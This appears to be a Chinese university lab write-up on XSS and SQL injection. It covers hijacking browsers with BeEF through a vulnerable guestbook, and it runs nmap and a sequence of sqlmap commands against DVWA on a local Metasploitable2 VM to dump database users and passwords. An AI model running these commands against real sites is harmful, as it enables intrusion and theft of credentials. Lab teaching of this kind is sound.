实验目的
了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境
Kali Linux 2、Windows Server
网络环境
交换网络结构
实验工具
Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
XSS部分:利用Beef劫持被攻击者客户端浏览器
实验环境搭建
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站)
被攻击者:访问留言簿网站,浏览器被劫持。
注意!一定要把搭建的网站的权限打开,否则将无法留言
1、利用AWVS扫描留言簿网站,发现其存在XSS漏洞
2、 Kali使用beef生成恶意代码
3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板
4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图
将网页重定向为学校主页
SQL注入部分:DVWA+SQLmap+Mysql注入实战
首先扫描处于同一网段的Metasploitable2的IP
得到本机ip
nmap -sP 你所处网段/24
得到处于同一网段所有主机的ip
得到Metasploitable2的ip
输入http://Metasploitable的IP/dvwa得到以下画面
默认账号:admin
密码:password
输入账号登录
将SQL Injection中的high级别调为low级别,进行SQL注入的尝试
开启Firefox浏览器TamperData插件,等待获取cookies值,在SQL Injection输入1,即可获取cookie
此时得到注入点:http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
TamperData弹窗获取cookies值:security=low;PHPSESSID=438c6341d84f86576782371e85b0bc03
1、枚举登录MYSQL数据的用户名与密码
sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03”-b --current-db --current-user
2、枚举所有数据库
sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03”–string=“Surname” --users --password
3、枚举数据库和指定数据库的数据表
sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” --dbs
sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa --tables
4、获取指定数据库和表中所有列的信息
sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa -T users --columns
5、枚举指定数据表中的所有用户名与密码
sqlmap -u “http://192.168.126.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=438c6341d84f86576782371e85b0bc03” -D dvwa -T users -C user,password --dump